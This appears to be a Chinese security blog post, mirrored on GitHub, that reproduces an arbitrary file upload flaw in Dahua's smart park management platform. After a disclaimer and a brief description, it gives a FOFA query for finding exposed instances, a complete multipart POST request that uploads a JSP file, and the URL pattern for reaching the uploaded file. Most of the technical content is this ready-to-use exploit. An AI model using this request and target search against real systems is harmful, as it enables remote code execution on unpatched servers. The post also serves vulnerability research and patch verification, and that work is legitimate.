Skip to content

Latest commit

 

History

History
88 lines (44 loc) · 2.5 KB

[我爱林]-2023-7-24-漏洞复现 || ​大华智慧园区综合管理平台存在任意文件上传.md

File metadata and controls

88 lines (44 loc) · 2.5 KB

漏洞复现 || ​大华智慧园区综合管理平台存在任意文件上传

韩文庚 我爱林

我爱林

微信号 CoderWin

功能介绍 原创歌词等你发表意见!为你揭秘恋爱正常表现!翻唱聆听自己内心世界!IT分享成为网络安全教练!


__发表于

收录于合集

#渗透测试 155 个

#网络安全 158 个

#漏洞复现 151 个

免责声明

我爱林攻防研究院的技术文章仅供参考, 任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益 ,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。 本文所提供的工具仅用于学习,禁止用于其他!!!

漏洞描述

大华智慧园区综合管理平台是一个集智能化、信息化、网络化、安全化为一体的智慧园区管理平台,旨在为园区提供一站式解决方案,包括安防、能源管理、环境监测、人员管理、停车管理等多个方面。大华智慧园区综合管理平台任意文件上传漏洞,攻击者可以通过该漏洞上传任意文件,导致系统被攻击与控制。

资产确定

 ** **fofa:**** ** **"/WPMS/asset/lib/gridster/"****

漏洞复现

1.利用如下POST发送请求


POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1Host: {{Hostname}}Content-Length: 230Content-Type: multipart/form-data; boundary=f3aeb22be281d77542546a2f71e20982  
--f3aeb22be281d77542546a2f71e20982Content-Disposition: form-data; name="upload"; filename="a.jsp"Content-Type: application/octet-streamContent-Transfer-Encoding: binary  
123456789--f3aeb22be281d77542546a2f71e20982--  

2.利用如下拼接返回包内data的jsp文件

http://{{Hostname}}/upload/emap/society_new/返回包内的data数据.jsp

如有侵权,请联系删除

预览时标签不可点

微信扫一扫
关注该公众号

知道了

微信扫一扫
使用小程序


取消 允许


取消 允许

: , 。 视频 小程序 赞 ,轻点两下取消赞 在看 ,轻点两下取消在看